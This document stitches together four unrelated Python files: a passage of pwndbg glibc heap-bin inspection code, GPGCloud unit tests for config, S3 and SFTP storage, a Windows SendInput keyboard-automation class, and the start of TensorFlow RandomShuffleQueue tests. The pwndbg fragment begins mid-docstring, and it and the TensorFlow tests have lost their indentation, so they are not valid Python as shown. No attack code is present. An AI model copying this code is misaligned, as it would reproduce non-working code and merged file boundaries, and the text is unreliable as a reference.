and falls back to using /proc/self/maps (vmmap) which can be wrong
when .bss is very large
"""
lower, upper = None, None
try:
lower = int(self.mp['sbrk_base'])
except:
lower = None
page = None
for m in pwndbg.vmmap.get():
if m.objfile == '[heap]':
page = m
break
if page is not None:
lower = lower or page.vaddr
return (lower, page.vaddr + page.memsz)
return (None, None)
def fastbin_index(self, size):
if pwndbg.arch.ptrsize == 8:
return (size >> 4) - 2
else:
return (size >> 3) - 2
def fastbins(self, arena_addr=None):
arena = self.get_arena(arena_addr)
if arena is None:
return
fastbinsY = arena['fastbinsY']
fd_offset = self.chunk_key_offset('fd')
num_fastbins = 7
size = pwndbg.arch.ptrsize * 2
result = OrderedDict()
for i in range(num_fastbins):
size += pwndbg.arch.ptrsize * 2
chain = pwndbg.chain.get(int(fastbinsY[i]), offset=fd_offset)
result[size] = chain
return result
def bin_at(self, index, arena_addr=None):
"""
Modeled after glibc's bin_at function - so starts indexing from 1
https://bazaar.launchpad.net/~ubuntu-branches/ubuntu/trusty/eglibc/trusty-security/view/head:/malloc/malloc.c#L1394
bin_at(1) returns the unsorted bin
Bin 1 - Unsorted BiN
Bin 2 to 63 - Smallbins
Bin 64 to 126 - Largebins
"""
index = index - 1
arena = self.get_arena(arena_addr)
if arena is None:
return
normal_bins = arena['bins']
num_bins = normal_bins.type.sizeof // normal_bins.type.target().sizeof
bins_base = int(normal_bins.address) - (pwndbg.arch.ptrsize* 2)
current_base = bins_base + (index * pwndbg.arch.ptrsize * 2)
front, back = normal_bins[index * 2], normal_bins[index * 2 + 1]
fd_offset = self.chunk_key_offset('fd')
chain = pwndbg.chain.get(int(front), offset=fd_offset, hard_stop=current_base)
return chain
def unsortedbin(self, arena_addr=None):
chain = self.bin_at(1, arena_addr=arena_addr)
result = OrderedDict()
if chain is None:
return
result['all'] = chain
return result
def smallbins(self, arena_addr=None):
size = self.min_chunk_size - self.malloc_alignment
spaces_table = self._spaces_table()
result = OrderedDict()
for index in range(2, 64):
size += spaces_table[index]
chain = self.bin_at(index, arena_addr=arena_addr)
if chain is None:
return
result[size] = chain
return result
def largebins(self, arena_addr=None):
size = (ptmalloc.NSMALLBINS * self.malloc_alignment) - self.malloc_alignment
spaces_table = self._spaces_table()
result = OrderedDict()
for index in range(64, 127):
size += spaces_table[index]
chain = self.bin_at(index, arena_addr=arena_addr)
if chain is None:
return
result[size] = chain
return result
| |
"""
Unit tests for `GPGCloud` project.
"""
import os
import tempfile
import unittest
from cloud import Cloud, amazon, sftp
from config import Config, ConfigError
from database import MetaDataDB
from lib import random_string, checksum_file, checksum_data
class TestUtils(unittest.TestCase):
    """
    Test cases for utility functions.
    """
    def setUp(self):
        pass

    def test_utils_random_string(self):
        """
        Test random string creation.

        Two strings of the same requested length must differ.
        """
        for length in range(10, 100, 10):
            random_1 = random_string(length)
            random_2 = random_string(length)
            self.assertEqual(len(random_1), length)
            self.assertEqual(len(random_2), length)
            self.assertNotEqual(random_1, random_2)

    def test_utils_checksum(self):
        """
        Test checksum functions.

        Verifies both the in-memory and the file-based checksum against a
        known SHA-256 digest of the LICENSE file.
        """
        checksum = "ba5d39304c72c92f73203798033eb52b" \
                   "e1830da828d4c82ee7023b74b81949d8"
        # Bug fix: use open() in a context manager instead of the
        # Python 2-only file() builtin, which also leaked the handle.
        with open("LICENSE") as f:
            data = f.read()
        self.assertEqual(checksum_data(data), checksum)
        self.assertEqual(checksum_file("LICENSE"), checksum)
class TestConfig(unittest.TestCase):
    """
    Test cases for configuration handling.
    """
    def setUp(self):
        pass

    @staticmethod
    def _write_config(data):
        """Write *data* to test_config.conf, replacing any existing file."""
        # Bug fix: open() in text mode replaces the Python 2-only
        # file(name, "wb") idiom; the handle is now closed deterministically
        # and writing a str also works on Python 3.
        with open("test_config.conf", "w") as f:
            f.write(data)

    def test_config_no_file(self):
        """
        Test configuration handling without config file.
        """
        if os.path.isfile("test_config.conf"):
            os.remove("test_config.conf")
        self.assertRaises(ConfigError, Config, "test_config.conf")

    def test_config_ok_config(self):
        """
        Test configuration handling with config file.
        """
        test_data = ("[gnupg]\n"
                     "recipients = tkl@iki.fi\n"
                     "signer = tommi.linnakangas@iki.fi\n"
                     "\n"
                     "[amazon-s3]\n"
                     "access_key = ACCESSKEY\n"
                     "secret_access_key = SECRETACCESSKEY\n"
                     "\n"
                     "[data]\n"
                     "\n"
                     "bucket = DATABUCKET\n"
                     "[metadata]\n"
                     "bucket = METADATABUCKET\n"
                     "\n")
        if os.path.isfile("test_config.conf"):
            os.remove("test_config.conf")
        self._write_config(test_data)
        config = Config("test_config.conf")
        self.assertIn("gnupg", config.config.sections())
        self.assertIn("amazon-s3", config.config.sections())
        self.assertEqual(config.config.get(
            "gnupg", "recipients"), "tkl@iki.fi")
        self.assertEqual(config.config.get(
            "gnupg", "signer"), "tommi.linnakangas@iki.fi")
        self.assertEqual(config.config.get(
            "amazon-s3", "access_key"), "ACCESSKEY")
        self.assertEqual(config.config.get(
            "amazon-s3", "secret_access_key"), "SECRETACCESSKEY")
        self.assertEqual(config.config.get(
            "data", "bucket"), "DATABUCKET")
        self.assertEqual(config.config.get(
            "metadata", "bucket"), "METADATABUCKET")
        os.remove("test_config.conf")

    def test_config_wrong_config(self):
        """
        Test configuration handling with config file with wrong config.

        Case 1: required section is missing; case 2: required option is
        missing. Both must raise ConfigError from Config.check().
        """
        test_data_1 = ("[gnupg_missing]\n"
                       "recipients = tkl@iki.fi\n"
                       "signer = tkl@iki.fi\n"
                       "[amazon-s3]\n"
                       "access_key = ACCESSKEY\n"
                       "secret_access_key = SECRETACCESSKEY\n"
                       "[data]\n"
                       "bucket = DATABUCKET\n"
                       "[metadata]\n"
                       "bucket = METADATABUCKET\n")
        test_data_2 = ("[gnupg]\n"
                       "recipients_missing = tkl@iki.fi\n"
                       "signer = tkl@iki.fi\n"
                       "[amazon-s3]\n"
                       "access_key = ACCESSKEY\n"
                       "secret_access_key = SECRETACCESSKEY\n"
                       "[data]\n"
                       "bucket = DATABUCKET\n"
                       "[metadata]\n"
                       "bucket = METADATABUCKET\n")
        if os.path.isfile("test_config.conf"):
            os.remove("test_config.conf")
        self._write_config(test_data_1)
        config = Config("test_config.conf")
        self.assertRaises(
            ConfigError, config.check, "gnupg", ["recipients", "signer"])
        self._write_config(test_data_2)
        config = Config("test_config.conf")
        self.assertRaises(
            ConfigError, config.check, "gnupg", ["recipients", "signer"])
        os.remove("test_config.conf")
class TestAmazonS3(unittest.TestCase):
    """
    Test cases for Amazon S3 access.

    NOTE(review): these are integration tests - they need valid credentials
    and network access to the configured buckets.
    """
    def setUp(self):
        pass

    def test_amazon_s3_store_data(self):
        """
        Test storing data to Amazons S3, both to metadata and data buckets.
        """
        config = Config()
        metadata_bucket = config.config.get("metadata", "bucket")
        data_bucket = config.config.get("data", "bucket")
        metadata_provider = amazon.S3(config, metadata_bucket).connect()
        provider = amazon.S3(config, data_bucket).connect()
        datas = dict()
        metadatas = dict()
        for data, metadata in (("Data 1", "Metadata 1"),
                               ("Data 2", "Metadata 2")):
            key = checksum_data(data)
            metadata_provider.store(key, metadata)
            provider.store(key, data)
            new_metadata = metadata_provider.retrieve(key)
            new_data = provider.retrieve(key)
            self.assertEqual(new_data, data)
            self.assertEqual(new_metadata, metadata)
            datas[key] = data
            metadatas[key] = metadata
        # Every listed key must round-trip to what was stored.
        for key, metadata in metadata_provider.list().items():
            self.assertEqual(metadata, metadatas[key])
        for key, data in provider.list().items():
            self.assertEqual(data, datas[key])
        for key, metadata in metadatas.items():
            metadata_provider.delete(key)
        for key, data in datas.items():
            provider.delete(key)
        metadata_provider.disconnect()
        provider.disconnect()

    def test_amazon_s3_store_filename(self):
        """
        Test storing files to Amazons S3, both to metadata and data buckets.
        """
        config = Config()
        metadata_bucket = config.config.get("metadata", "bucket")
        data_bucket = config.config.get("data", "bucket")
        metadata_provider = amazon.S3(config, metadata_bucket).connect()
        provider = amazon.S3(config, data_bucket).connect()
        key = checksum_file("LICENSE")
        metadata_provider.store(key, "LICENSE METADATA")
        provider.store_from_filename(key, "LICENSE")
        t = tempfile.NamedTemporaryFile()
        metadata = metadata_provider.retrieve(key)
        provider.retrieve_to_filename(key, t.name)
        # Bug fix: open() replaces the Python 2-only file() builtin and
        # closes both handles deterministically.
        with open("LICENSE") as expected, open(t.name) as actual:
            self.assertEqual(expected.read(), actual.read())
        self.assertEqual("LICENSE METADATA", metadata)
        metadata_provider.delete(key)
        provider.delete(key)
        metadata_provider.disconnect()
        provider.disconnect()

    def test_amazon_s3_delete_all_keys(self):
        """
        Test deleting all Amazons S3 keys, both from metadata and
        data buckets.
        """
        config = Config()
        metadata_bucket = config.config.get("metadata", "bucket")
        data_bucket = config.config.get("data", "bucket")
        metadata_provider = amazon.S3(config, metadata_bucket).connect()
        provider = amazon.S3(config, data_bucket).connect()
        for key, metadata in metadata_provider.list().items():
            metadata_provider.delete(key)
        for key, data in provider.list().items():
            provider.delete(key)
        metadata_provider.disconnect()
        provider.disconnect()
class TestSftp(unittest.TestCase):
    """
    Test cases for SFTP filesystem.

    NOTE(review): these are integration tests - they need a reachable SFTP
    server configured in the config file.
    """
    def setUp(self):
        pass

    def test_sftp_store_data(self):
        """
        Test storing data to filesystem, both to metadata and data buckets.
        """
        config = Config()
        metadata_bucket = config.config.get("metadata", "bucket")
        data_bucket = config.config.get("data", "bucket")
        metadata_provider = sftp.Sftp(config, metadata_bucket).connect()
        provider = sftp.Sftp(config, data_bucket).connect()
        datas = dict()
        metadatas = dict()
        for data, metadata in (("Data 1", "Metadata 1"),
                               ("Data 2", "Metadata 2")):
            key = checksum_data(data)
            metadata_provider.store(key, metadata)
            provider.store(key, data)
            new_metadata = metadata_provider.retrieve(key)
            new_data = provider.retrieve(key)
            self.assertEqual(new_data, data)
            self.assertEqual(new_metadata, metadata)
            datas[key] = data
            metadatas[key] = metadata
        # Every listed key must round-trip to what was stored.
        for key, metadata in metadata_provider.list().items():
            self.assertEqual(metadata, metadatas[key])
        for key, data in provider.list().items():
            self.assertEqual(data, datas[key])
        for key, metadata in metadatas.items():
            metadata_provider.delete(key)
        for key, data in datas.items():
            provider.delete(key)
        metadata_provider.disconnect()
        provider.disconnect()

    def test_sftp_store_filename(self):
        """
        Test storing files to SFTP filesystem, both to metadata and data
        buckets.
        """
        config = Config()
        metadata_bucket = config.config.get("metadata", "bucket")
        data_bucket = config.config.get("data", "bucket")
        metadata_provider = sftp.Sftp(config, metadata_bucket).connect()
        provider = sftp.Sftp(config, data_bucket).connect()
        key = checksum_file("LICENSE")
        metadata_provider.store(key, "LICENSE METADATA")
        provider.store_from_filename(key, "LICENSE")
        t = tempfile.NamedTemporaryFile()
        metadata = metadata_provider.retrieve(key)
        provider.retrieve_to_filename(key, t.name)
        # Bug fix: open() replaces the Python 2-only file() builtin and
        # closes both handles deterministically.
        with open("LICENSE") as expected, open(t.name) as actual:
            self.assertEqual(expected.read(), actual.read())
        self.assertEqual("LICENSE METADATA", metadata)
        metadata_provider.delete(key)
        provider.delete(key)
        metadata_provider.disconnect()
        provider.disconnect()

    def test_sftp_delete_all_keys(self):
        """
        Test deleting all filesystem keys, both from metadata and
        data buckets.
        """
        config = Config()
        metadata_bucket = config.config.get("metadata", "bucket")
        data_bucket = config.config.get("data", "bucket")
        metadata_provider = sftp.Sftp(config, metadata_bucket).connect()
        provider = sftp.Sftp(config, data_bucket).connect()
        for key, metadata in metadata_provider.list().items():
            metadata_provider.delete(key)
        for key, data in provider.list().items():
            provider.delete(key)
        metadata_provider.disconnect()
        provider.disconnect()
class TestCloud(unittest.TestCase):
    """
    Test cases for cloud access, data is encrypted and decrypted.

    Concrete subclasses select the encryption method by overriding the
    test_* entry points.
    """
    def setUp(self):
        pass

    @staticmethod
    def _read_file(path):
        """Return the whole contents of *path*."""
        # Bug fix: open() in a context manager replaces the Python 2-only
        # file() builtin, which also leaked the file handle.
        with open(path) as f:
            return f.read()

    def _test_cloud_store_data(self, config, metadata_provider, provider):
        """
        Store encrypted data to cloud.
        """
        database = MetaDataDB(config)
        database.drop()
        cloud = Cloud(config, metadata_provider, provider, database).connect()
        data1 = self._read_file("testdata/data1.txt")
        # data3/data4 deliberately reuse data2.txt's contents so the same
        # plaintext is stored under several paths (see the assertions
        # below, which expect data2 back for metadata3/metadata4).
        data2 = self._read_file("testdata/data2.txt")
        data3 = self._read_file("testdata/data2.txt")
        data4 = self._read_file("testdata/data2.txt")
        metadata1 = cloud.store(data1, "testdata/data1.txt")
        metadata2 = cloud.store(data2, "testdata/data2.txt")
        metadata3 = cloud.store(data3, "testdata/data3.txt")
        metadata4 = cloud.store(data4, "testdata/data4.txt")
        for metadata in cloud.list():
            if metadata["key"] == metadata1["key"]:
                self.assertEqual("testdata/data1.txt", metadata["path"])
            if metadata["key"] == metadata2["key"]:
                self.assertEqual("testdata/data2.txt", metadata["path"])
            if metadata["key"] == metadata3["key"]:
                self.assertEqual("testdata/data3.txt", metadata["path"])
            if metadata["key"] == metadata4["key"]:
                self.assertEqual("testdata/data4.txt", metadata["path"])
        new_data1 = cloud.retrieve(metadata1)
        new_data2 = cloud.retrieve(metadata2)
        new_data3 = cloud.retrieve(metadata3)
        new_data4 = cloud.retrieve(metadata4)
        self.assertEqual(data1, new_data1)
        self.assertEqual("testdata/data1.txt", metadata1["path"])
        self.assertEqual(data2, new_data2)
        self.assertEqual("testdata/data2.txt", metadata2["path"])
        self.assertEqual(data2, new_data3)
        self.assertEqual("testdata/data3.txt", metadata3["path"])
        self.assertEqual(data2, new_data4)
        self.assertEqual("testdata/data4.txt", metadata4["path"])
        cloud.delete(metadata1)
        cloud.delete(metadata2)
        cloud.delete(metadata3)
        cloud.delete(metadata4)
        cloud.disconnect()

    def _test_cloud_amazon_s3_store_data(self, encryption_method):
        """Run the store-data scenario against Amazon S3 providers."""
        config = Config()
        metadata_bucket = config.config.get("metadata", "bucket")
        data_bucket = config.config.get("data", "bucket")
        metadata_provider = amazon.S3(config, metadata_bucket).connect()
        provider = amazon.S3(config, data_bucket, encryption_method).connect()
        self._test_cloud_store_data(config, metadata_provider, provider)

    def _test_cloud_sftp_store_data(self, encryption_method):
        """Run the store-data scenario against SFTP providers."""
        config = Config()
        metadata_bucket = config.config.get("metadata", "bucket")
        data_bucket = config.config.get("data", "bucket")
        metadata_provider = sftp.Sftp(config, metadata_bucket).connect()
        provider = sftp.Sftp(config, data_bucket, encryption_method).connect()
        self._test_cloud_store_data(config, metadata_provider, provider)

    def _test_cloud_store_filename(self, config, metadata_provider, provider):
        """
        Store file as encrypted data to cloud.
        """
        database = MetaDataDB(config)
        database.drop()
        cloud = Cloud(config, metadata_provider, provider, database).connect()
        data1 = self._read_file("testdata/data1.txt")
        data2 = self._read_file("testdata/data2.txt")
        # data3/data4 reuse data2.txt on purpose (same plaintext, several
        # paths) - mirrored by the data2 comparisons below.
        metadata1 = cloud.store_from_filename(
            "testdata/data1.txt", "testdata/data1.txt")
        metadata2 = cloud.store_from_filename(
            "testdata/data2.txt", "testdata/data2.txt")
        metadata3 = cloud.store_from_filename(
            "testdata/data2.txt", "testdata/data3.txt")
        metadata4 = cloud.store_from_filename(
            "testdata/data2.txt", "testdata/data4.txt")
        for metadata in cloud.list():
            if metadata["key"] == metadata1["key"]:
                self.assertEqual("testdata/data1.txt", metadata["path"])
            if metadata["key"] == metadata2["key"]:
                self.assertEqual("testdata/data2.txt", metadata["path"])
            if metadata["key"] == metadata3["key"]:
                self.assertEqual("testdata/data3.txt", metadata["path"])
            if metadata["key"] == metadata4["key"]:
                self.assertEqual("testdata/data4.txt", metadata["path"])
        cloud.retrieve_to_filename(
            metadata1, "testdata/new_data1.txt")
        cloud.retrieve_to_filename(
            metadata2, "testdata/new_data2.txt")
        cloud.retrieve_to_filename(
            metadata3, "testdata/new_data3.txt")
        cloud.retrieve_to_filename(
            metadata4, "testdata/new_data4.txt")
        self.assertEqual(data1, self._read_file("testdata/new_data1.txt"))
        self.assertEqual("testdata/data1.txt", metadata1["path"])
        self.assertEqual(data2, self._read_file("testdata/new_data2.txt"))
        self.assertEqual("testdata/data2.txt", metadata2["path"])
        self.assertEqual(data2, self._read_file("testdata/new_data3.txt"))
        self.assertEqual("testdata/data3.txt", metadata3["path"])
        self.assertEqual(data2, self._read_file("testdata/new_data4.txt"))
        self.assertEqual("testdata/data4.txt", metadata4["path"])
        cloud.delete(metadata1)
        cloud.delete(metadata2)
        cloud.delete(metadata3)
        cloud.delete(metadata4)
        cloud.disconnect()
        os.remove("testdata/new_data1.txt")
        os.remove("testdata/new_data2.txt")
        os.remove("testdata/new_data3.txt")
        os.remove("testdata/new_data4.txt")

    def _test_cloud_amazon_s3_store_filename(self, encryption_method):
        """Run the store-from-filename scenario against Amazon S3."""
        config = Config()
        metadata_bucket = config.config.get("metadata", "bucket")
        data_bucket = config.config.get("data", "bucket")
        metadata_provider = amazon.S3(config, metadata_bucket).connect()
        provider = amazon.S3(config, data_bucket, encryption_method).connect()
        self._test_cloud_store_filename(config, metadata_provider, provider)

    def _test_cloud_sftp_store_filename(self, encryption_method):
        """Run the store-from-filename scenario against SFTP."""
        config = Config()
        metadata_bucket = config.config.get("metadata", "bucket")
        data_bucket = config.config.get("data", "bucket")
        metadata_provider = sftp.Sftp(config, metadata_bucket).connect()
        provider = sftp.Sftp(config, data_bucket, encryption_method).connect()
        self._test_cloud_store_filename(config, metadata_provider, provider)
class TestCloudGpgEncryption(TestCloud):
    """Run the TestCloud scenarios with GPG public-key encryption."""

    def test_cloud_amazon_s3_store_data(self):
        self._test_cloud_amazon_s3_store_data("gpg")

    def test_cloud_sftp_store_data(self):
        self._test_cloud_sftp_store_data("gpg")

    def test_cloud_amazon_s3_store_filename(self):
        self._test_cloud_amazon_s3_store_filename("gpg")

    def test_cloud_sftp_store_filename(self):
        self._test_cloud_sftp_store_filename("gpg")
class TestCloudSymmetricEncryption(TestCloud):
    """Run the TestCloud scenarios with symmetric encryption."""

    def test_cloud_amazon_s3_store_data(self):
        self._test_cloud_amazon_s3_store_data("symmetric")

    def test_cloud_sftp_store_data(self):
        self._test_cloud_sftp_store_data("symmetric")

    def test_cloud_amazon_s3_store_filename(self):
        self._test_cloud_amazon_s3_store_filename("symmetric")

    def test_cloud_sftp_store_filename(self):
        self._test_cloud_sftp_store_filename("symmetric")
class TestCloudCryptoEngineEncryption(TestCloud):
    """Run the TestCloud scenarios with the cryptoengine backend."""

    def test_cloud_amazon_s3_store_data(self):
        self._test_cloud_amazon_s3_store_data("cryptoengine")

    def test_cloud_sftp_store_data(self):
        self._test_cloud_sftp_store_data("cryptoengine")

    def test_cloud_amazon_s3_store_filename(self):
        self._test_cloud_amazon_s3_store_filename("cryptoengine")

    def test_cloud_sftp_store_filename(self):
        self._test_cloud_sftp_store_filename("cryptoengine")
# Run the whole suite when this module is executed directly.
if __name__ == "__main__":
    unittest.main()
| |
#!/usr/bin/env python
# Copyright (c) 2014-2017 Max Beloborodko.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__author__ = 'f1ashhimself@gmail.com'
import ctypes
from time import sleep
from ..interfaces.i_keyboard import Key, IKeyboard
# user32!SendInput is used below to synthesize keyboard events.
send_input = ctypes.windll.user32.SendInput
# Shorthand for the pointer type used by the dwExtraInfo fields below.
pointer_unsigned_long = ctypes.POINTER(ctypes.c_ulong)
class KeyboardInput(ctypes.Structure):
    """
    Keyboard input C struct definition.

    Mirrors the Win32 KEYBDINPUT structure passed to SendInput. A pointer
    type stands in for ULONG_PTR in dwExtraInfo (same width).
    """
    _fields_ = [("wVk", ctypes.c_ushort),
                ("wScan", ctypes.c_ushort),
                ("dwFlags", ctypes.c_ulong),
                ("time", ctypes.c_ulong),
                ("dwExtraInfo", pointer_unsigned_long)]
class HardwareInput(ctypes.Structure):
    """
    Hardware input C struct definition.

    Mirrors the Win32 HARDWAREINPUT structure (unused variant of the
    INPUT union below).
    """
    _fields_ = [("uMsg", ctypes.c_ulong),
                ("wParamL", ctypes.c_short),
                ("wParamH", ctypes.c_ushort)]
class MouseInput(ctypes.Structure):
    """
    Mouse input C struct definition.

    Mirrors the Win32 MOUSEINPUT structure (the original docstring wrongly
    said "Hardware input").
    """
    _fields_ = [("dx", ctypes.c_long),
                ("dy", ctypes.c_long),
                ("mouseData", ctypes.c_ulong),
                ("dwFlags", ctypes.c_ulong),
                ("time", ctypes.c_ulong),
                ("dwExtraInfo", pointer_unsigned_long)]
class EventStorage(ctypes.Union):
    """
    Event storage C union definition.

    Mirrors the anonymous union inside the Win32 INPUT structure: exactly
    one of the keyboard/mouse/hardware variants is active per event.
    """
    _fields_ = [("ki", KeyboardInput),
                ("mi", MouseInput),
                ("hi", HardwareInput)]
class Input(ctypes.Structure):
    """
    Input C struct definition.

    Mirrors the Win32 INPUT structure: `type` selects which member of the
    `ii` union is meaningful (1 == INPUT_KEYBOARD).
    """
    _fields_ = [("type", ctypes.c_ulong),
                ("ii", EventStorage)]
class WinKeyboard(IKeyboard):
    """
    IKeyboard implementation for Windows, synthesizing key events through
    user32!SendInput.
    """
    class _KeyCodes(object):
        """
        Holder for Windows keyboard codes stored as Keys.

        Values are Windows virtual-key (VK_*) codes.
        """
        BACKSPACE = Key(0x08)  # BACKSPACE key
        TAB = Key(0x09)  # TAB key
        CLEAR = Key(0x0C)  # CLEAR key
        RETURN = Key(0x0D)  # ENTER key
        SHIFT = Key(0x10)  # SHIFT key
        CONTROL = Key(0x11)  # CTRL key
        ALT = Key(0x12)  # ALT key
        PAUSE = Key(0x13)  # PAUSE key
        CAPS_LOCK = Key(0x14)  # CAPS LOCK key
        ESCAPE = Key(0x1B)  # ESC key
        SPACE = Key(0x20)  # SPACEBAR
        PAGE_UP = Key(0x21)  # PAGE UP key
        PAGE_DOWN = Key(0x22)  # PAGE DOWN key
        END = Key(0x23)  # END key
        HOME = Key(0x24)  # HOME key
        LEFT = Key(0x25)  # LEFT ARROW key
        UP = Key(0x26)  # UP ARROW key
        RIGHT = Key(0x27)  # RIGHT ARROW key
        DOWN = Key(0x28)  # DOWN ARROW key
        PRINT_SCREEN = Key(0x2C)  # PRINT SCREEN key
        INSERT = Key(0x2D)  # INS key
        DELETE = Key(0x2E)  # DEL key
        VK_HELP = Key(0x2F)  # HELP key
        KEY_0 = Key(0x30)  # 0 key
        KEY_1 = Key(0x31)  # 1 key
        KEY_2 = Key(0x32)  # 2 key
        KEY_3 = Key(0x33)  # 3 key
        KEY_4 = Key(0x34)  # 4 key
        KEY_5 = Key(0x35)  # 5 key
        KEY_6 = Key(0x36)  # 6 key
        KEY_7 = Key(0x37)  # 7 key
        KEY_8 = Key(0x38)  # 8 key
        KEY_9 = Key(0x39)  # 9 key
        KEY_A = Key(0x41)  # A key
        KEY_B = Key(0x42)  # B key
        KEY_C = Key(0x43)  # C key
        KEY_D = Key(0x44)  # D key
        KEY_E = Key(0x45)  # E key
        KEY_F = Key(0x46)  # F key
        KEY_G = Key(0x47)  # G key
        KEY_H = Key(0x48)  # H key
        KEY_I = Key(0x49)  # I key
        KEY_J = Key(0x4A)  # J key
        KEY_K = Key(0x4B)  # K key
        KEY_L = Key(0x4C)  # L key
        KEY_M = Key(0x4D)  # M key
        KEY_N = Key(0x4E)  # N key
        KEY_O = Key(0x4F)  # O key
        KEY_P = Key(0x50)  # P key
        KEY_Q = Key(0x51)  # Q key
        KEY_R = Key(0x52)  # R key
        KEY_S = Key(0x53)  # S key
        KEY_T = Key(0x54)  # T key
        KEY_U = Key(0x55)  # U key
        KEY_V = Key(0x56)  # V key
        KEY_W = Key(0x57)  # W key
        KEY_X = Key(0x58)  # X key
        KEY_Y = Key(0x59)  # Y key
        KEY_Z = Key(0x5A)  # Z key
        LEFT_WIN = Key(0x5B)  # Left Windows key (Natural keyboard)
        RIGHT_WIN = Key(0x5C)  # Right Windows key (Natural keyboard)
        SLEEP = Key(0x5F)  # Computer Sleep key
        NUMPAD0 = Key(0x60)  # Numeric keypad 0 key
        NUMPAD1 = Key(0x61)  # Numeric keypad 1 key
        NUMPAD2 = Key(0x62)  # Numeric keypad 2 key
        NUMPAD3 = Key(0x63)  # Numeric keypad 3 key
        NUMPAD4 = Key(0x64)  # Numeric keypad 4 key
        NUMPAD5 = Key(0x65)  # Numeric keypad 5 key
        NUMPAD6 = Key(0x66)  # Numeric keypad 6 key
        NUMPAD7 = Key(0x67)  # Numeric keypad 7 key
        NUMPAD8 = Key(0x68)  # Numeric keypad 8 key
        NUMPAD9 = Key(0x69)  # Numeric keypad 9 key
        MULTIPLY = Key(0x6A)  # Multiply key
        ADD = Key(0x6B)  # Add key
        SEPARATOR = Key(0x6C)  # Separator key
        SUBTRACT = Key(0x6D)  # Subtract key
        DECIMAL = Key(0x6E)  # Decimal key
        DIVIDE = Key(0x6F)  # Divide key
        F1 = Key(0x70)  # F1 key
        F2 = Key(0x71)  # F2 key
        F3 = Key(0x72)  # F3 key
        F4 = Key(0x73)  # F4 key
        F5 = Key(0x74)  # F5 key
        F6 = Key(0x75)  # F6 key
        F7 = Key(0x76)  # F7 key
        F8 = Key(0x77)  # F8 key
        F9 = Key(0x78)  # F9 key
        F10 = Key(0x79)  # F10 key
        F11 = Key(0x7A)  # F11 key
        F12 = Key(0x7B)  # F12 key
        NUM_LOCK = Key(0x90)  # NUM LOCK key
        SCROLL_LOCK = Key(0x91)  # SCROLL LOCK
        LEFT_SHIFT = Key(0xA0)  # Left SHIFT key
        RIGHT_SHIFT = Key(0xA1)  # Right SHIFT key
        LEFT_CONTROL = Key(0xA2)  # Left CONTROL key
        RIGHT_CONTROL = Key(0xA3)  # Right CONTROL key
        OEM_1 = Key(0xBA)  # For the US standard keyboard, the ';:' key
        OEM_PLUS = Key(0xBB)  # For any country/region, the '+' key
        OEM_COMMA = Key(0xBC)  # For any country/region, the ',' key
        OEM_MINUS = Key(0xBD)  # For any country/region, the '-' key
        OEM_PERIOD = Key(0xBE)  # For any country/region, the '.' key
        OEM_2 = Key(0xBF)  # For the US standard keyboard, the '/?' key
        OEM_3 = Key(0xC0)  # For the US standard keyboard, the '`~' key
        OEM_4 = Key(0xDB)  # For the US standard keyboard, the '[{' key
        OEM_5 = Key(0xDC)  # For the US standard keyboard, the '\|' key
        OEM_6 = Key(0xDD)  # For the US standard keyboard, the ']}' key
        OEM_7 = Key(0xDE)  # For the US standard keyboard, the ''/"' key

    # Public alias required by the IKeyboard interface.
    codes = _KeyCodes

    def press_key(self, hex_key_code):
        """
        Presses (and releases) key specified by a hex code.

        :param int hex_key_code: hexadecimal code for a key to be pressed.
        """
        self.press_key_and_hold(hex_key_code)
        self.release_key(hex_key_code)

    def press_key_and_hold(self, hex_key_code):
        """
        Presses (and holds) key specified by a hex code.

        :param int hex_key_code: hexadecimal code for a key to be pressed.
        """
        extra = ctypes.c_ulong(0)
        ii_ = EventStorage()
        # dwFlags=0 -> key-down event. NOTE(review): wScan is hard-coded to
        # 0x48 for every key; presumably ignored because KEYEVENTF_SCANCODE
        # is not set - confirm.
        ii_.ki = KeyboardInput(hex_key_code, 0x48, 0, 0, ctypes.pointer(extra))
        # type 1 == INPUT_KEYBOARD.
        x = Input(ctypes.c_ulong(1), ii_)
        send_input(1, ctypes.pointer(x), ctypes.sizeof(x))

    def release_key(self, hex_key_code):
        """
        Releases key specified by a hex code.

        :param int hex_key_code: hexadecimal code for a key to be pressed.
        """
        extra = ctypes.c_ulong(0)
        ii_ = EventStorage()
        # dwFlags 0x0002 == KEYEVENTF_KEYUP (key release).
        ii_.ki = KeyboardInput(
            hex_key_code, 0x48, 0x0002, 0, ctypes.pointer(extra))
        x = Input(ctypes.c_ulong(1), ii_)
        send_input(1, ctypes.pointer(x), ctypes.sizeof(x))

    def send(self, *args, **kwargs):
        """
        Send key events as specified by Keys.

        If Key contains children Keys they will be recursively
        processed with current Key code pressed as a modifier key.

        :param args: keys to send.
        """
        # Optional keyword-only delay (seconds) inserted after each
        # top-level key.
        delay = kwargs.get('delay', 0)
        for key in args:
            if key.children:
                # Hold the modifier while sending its children.
                self.press_key_and_hold(key.code)
                self.send(*key.children)
                self.release_key(key.code)
            else:
                self.press_key(key.code)
            self._wait_for_key_combo_to_be_processed()
            sleep(delay)

    def _wait_for_key_combo_to_be_processed(self):
        # For key combinations timeout is needed to be processed.
        # This method is expressive shortcut to be used where needed.
        sleep(.05)
| |
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
import random
import re
import time
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
class RandomShuffleQueueTest(tf.test.TestCase):
  def setUp(self):
    """Log the test name so hung tests can be identified in the output."""
    # Useful for debugging when a test times out.
    super(RandomShuffleQueueTest, self).setUp()
    tf.logging.error("Starting: %s", self._testMethodName)
  def tearDown(self):
    """Log test completion (pairs with the message written in setUp)."""
    super(RandomShuffleQueueTest, self).tearDown()
    tf.logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 5, tf.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size().eval())
enqueue_op.run()
self.assertAllEqual(1, q.size().eval())
def testEnqueueWithShape(self):
with self.test_session():
q = tf.RandomShuffleQueue(
10, 5, tf.float32, shapes=tf.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size().eval())
